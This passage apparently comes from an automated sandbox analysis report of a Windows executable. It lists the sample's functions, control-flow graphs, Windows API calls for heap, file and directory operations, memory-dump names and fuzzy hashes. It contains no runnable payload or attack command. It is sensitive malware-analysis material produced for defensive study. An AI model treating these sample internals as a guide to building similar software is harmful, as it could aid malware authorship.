                    • TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                    • RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E967
                    • HeapReAlloc.KERNEL32(02200000,00000000,?,000FFFF6), ref: 0040E9B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocateValue
                    • String ID:
                    • API String ID: 1566162415-0
                    • Opcode ID: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction ID: 5ee2f831fd0b69a5072d4afb15d4d8d3f7e606a336c6d63425544261b24b472a
                    • Opcode Fuzzy Hash: 2f886b1653eeaf8e6e176882be529ab5a4d9cbf2fb84908f11b91f3f387303a9
                    • Instruction Fuzzy Hash: 35319674A00108EFCB00CF98D594A9DBBF5FB48314F24C1A9E855AB395D731AE51DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E560 Relevance: 4.6, APIs: 3, Instructions: 53memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 875 40e560-40e587 TlsGetValue 876 40e5a6-40e5c5 RtlReAllocateHeap 875->876 877 40e589-40e5a4 RtlAllocateHeap 875->877 878 40e5c7-40e5ed call 40ea40 876->878 877->878
                    APIs
                    • TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                    • RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    • RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeap$Value
                    • String ID:
                    • API String ID: 2497967046-0
                    • Opcode ID: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction ID: 56fdceb44a62e96a78129ec9cee9786d08dacee7710f0624d62ab86a2b9feb41
                    • Opcode Fuzzy Hash: 3c4de4927df5d1280fe3f97ef1b5d41f3313172c187ce59835a5c327154ebcf4
                    • Instruction Fuzzy Hash: 6011E974600208FFCB04CF99D894E9ABBB6FF88314F20C569E8099B354D734AA41DB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AD45 Relevance: 4.5, APIs: 3, Instructions: 41COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 881 40ad45-40ad52 882 40ad54-40ad86 wcsncpy wcslen 881->882 883 40adbd 881->883 885 40ad9e-40ada6 882->885 884 40adbf-40adc2 883->884 886 40ad88-40ad8f 885->886 887 40ada8-40adbb CreateDirectoryW 885->887 888 40ad91-40ad94 886->888 889 40ad9b 886->889 887->884 888->889 890 40ad96-40ad99 888->890 889->885 890->887 890->889
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CreateDirectorywcslenwcsncpy
                    • String ID:
                    • API String ID: 961886536-0
                    • Opcode ID: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction ID: 2d24f661812d06aabf4acf2af4a599dd38efaf3f9e777f7594d650cf82d0c1de
                    • Opcode Fuzzy Hash: d6c445466f8a19e48a25e4a2068d10de2bbe29753fac2d082d2e760440aa5e2b
                    • Instruction Fuzzy Hash: 9A01DBB0401318D6CB65DB64CC89AFE7379DF04301F6046BBE815E25D1E7389AA4DB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 891 408dee-408e26 memset InitCommonControlsEx CoInitialize
                    APIs
                    • memset.MSVCRT ref: 00408DFB
                    • InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                    • CoInitialize.OLE32(00000000), ref: 00408E1D
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CommonControlsInitInitializememset
                    • String ID:
                    • API String ID: 2179856907-0
                    • Opcode ID: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction ID: 955719fea0046c6293a44e32614ed026eb147d3324017d94785fb64326744d49
                    • Opcode Fuzzy Hash: d861f93e929e8b2be3fa0307ea6de5ff81dc4c61bc6e7fbf8c72a90690fa8d51
                    • Instruction Fuzzy Hash: FDE08CB088430CBBEB009BD0EC0EF8DBB7CEB00315F4041A4F904A2280EBB466488B95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B440 Relevance: 3.1, APIs: 2, Instructions: 65memoryfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040DB18: EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DB23
                      • Part of subcall function 0040DB18: LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B455,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB9E
                    • CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000080,00000000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000), ref: 0040B473
                    • HeapAlloc.KERNEL32(00000000,00001000,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B495
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$AllocCreateEnterFileHeapLeave
                    • String ID:
                    • API String ID: 3705299215-0
                    • Opcode ID: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction ID: 11d32f41a61cd8df30a66e4113f3bfff31ba723ad3a0b0249673477e2beeffa2
                    • Opcode Fuzzy Hash: 770ca6dcf0c78f014627849ec7c08e1bba775e026bf20b1c3eb2924782468709
                    • Instruction Fuzzy Hash: 62119371200304ABC2305F1ADC44B57BBF8EBC5764F14823EF565A37E1C77599158BA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E266 Relevance: 3.1, APIs: 2, Instructions: 61memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E3B9: HeapFree.KERNEL32(00000000,-00000018,00000200,00000000,0040E277,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 0040E3FA
                    • RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                    • memset.MSVCRT ref: 0040E2D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$AllocateFreememset
                    • String ID:
                    • API String ID: 2774703448-0
                    • Opcode ID: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction ID: 6d5d9c53e9755405ffb3e8ab18b4b48e318f9db4ecaa07005482283559b0ef73
                    • Opcode Fuzzy Hash: e4601c40af4f90fd6d7b6dc76b08f4e14a7cbeae79d3d170558c75ed44b030ef
                    • Instruction Fuzzy Hash: 5D117F72504314ABC320DF0AD944A4BBBE8EF88710F01492EF988A7351D774ED108BA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B050 Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON
                    Download Yara Rule
                    APIs
                    • HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ChangeCloseFindFreeHeapNotification
                    • String ID:
                    • API String ID: 1642550653-0
                    • Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
                    • Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
                    • Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E780 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                    Download Yara Rule
                    APIs
                    • wcslen.MSVCRT ref: 0040E78E
                    • RtlAllocateHeap.NTDLL(02200000,00000000,?,?,00000000,00000000), ref: 0040E7A9
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeapwcslen
                    • String ID:
                    • API String ID: 1345907364-0
                    • Opcode ID: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction ID: d40e0309548f3d2a4a525bb3e3ae8e28906eb34af4bb1b46d5d9fd1a2a98838f
                    • Opcode Fuzzy Hash: 72c8991afff95364d9171c38dd98e6fe33221a3a1fadc299bdc7e95de95877d4
                    • Instruction Fuzzy Hash: 83F05EB5600208FFCB04DFA5D880E9A77B9EB88718F10C46DF9088B390D635EA01CF94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040AE39 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON
                    Download Yara Rule
                    APIs
                    • SetFileAttributesW.KERNEL32(00000002,00000080,0040AE72,02209F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040AE50
                    • DeleteFileW.KERNELBASE(00000000,0040AE72,02209F70,00000000,00401FF0,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040AE5A
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: File$AttributesDelete
                    • String ID:
                    • API String ID: 2910425767-0
                    • Opcode ID: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction ID: 9bbbf45483326d305172a49cd8f3e34a401707f8027ad8c24340846d3084d85d
                    • Opcode Fuzzy Hash: 856d1dee773f9fe4b81d39230ef639874c988cfb4423ff7bdc63b5e612766022
                    • Instruction Fuzzy Hash: 36D09E30488300BBD7555B20DD0D75B7EA16F90745F08CC79B585610F1C7788C64EB4A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E4D0 Relevance: 3.0, APIs: 2, Instructions: 12memoryCOMMON
                    Download Yara Rule
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                    • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02200000,00000000,0000000C,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED4E
                      • Part of subcall function 0040ED40: HeapAlloc.KERNEL32(02200000,00000000,00000010,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED62
                      • Part of subcall function 0040ED40: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040E4F7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040ED8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocHeap$CreateValue
                    • String ID:
                    • API String ID: 493873155-0
                    • Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
                    • Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
                    • Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A330 Relevance: 2.6, APIs: 2, Instructions: 113COMMON
                    Download Yara Rule
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000,00000000,00000000), ref: 0040A412
                    • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,?,?,00000000,00403F00,00000001,00000002,00000000), ref: 0040A432
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide
                    • String ID:
                    • API String ID: 626452242-0
                    • Opcode ID: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction ID: fedc1c205319a766e10bd101b7b911e6f787ac623343fea3eb012fc010ddeeec
                    • Opcode Fuzzy Hash: a30fc8ce1e8d09fb33b6fb0615b8e378ebe935ed8b67f93c539b2d5397848702
                    • Instruction Fuzzy Hash: 0A3164361083056EC7349E799C80B7BB799EF80324F144B3FFEA1262C1D6789821976A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402BA6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    • GetShortPathNameW.KERNEL32(02209F70,02209F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                      • Part of subcall function 0040E5F0: RtlFreeHeap.NTDLL(02200000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                    • String ID:
                    • API String ID: 192546213-0
                    • Opcode ID: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
                    • Opcode Fuzzy Hash: 4ffc8271a727788d72dbd82b9e7b130440edac90e55bf10bd88016aa18fcca3f
                    • Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040B0C0 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON
                    Download Yara Rule
                    APIs
                    • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FileWrite
                    • String ID:
                    • API String ID: 3934441357-0
                    • Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
                    • Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
                    • Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402B6D Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                    • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
                    • Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
                    • Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040E5F0 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(02200000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID:
                    • API String ID: 3298025750-0
                    • Opcode ID: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction ID: cd5ef850ad68aae2c27baef3402967596087f0f1f33355341870062cdd1dbcb2
                    • Opcode Fuzzy Hash: 4a1186e03504991e415e8e092ef0052a0ef4c47318b2f6512a59703c6ea9925b
                    • Instruction Fuzzy Hash: 4ED0C9B2144218BFE614DB96FC58FF7776CE794750F50C82AFA048A1D0CA769890CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A220 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
                    • Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
                    • Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040A1C0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                    Download Yara Rule
                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                    Memory Dump Source
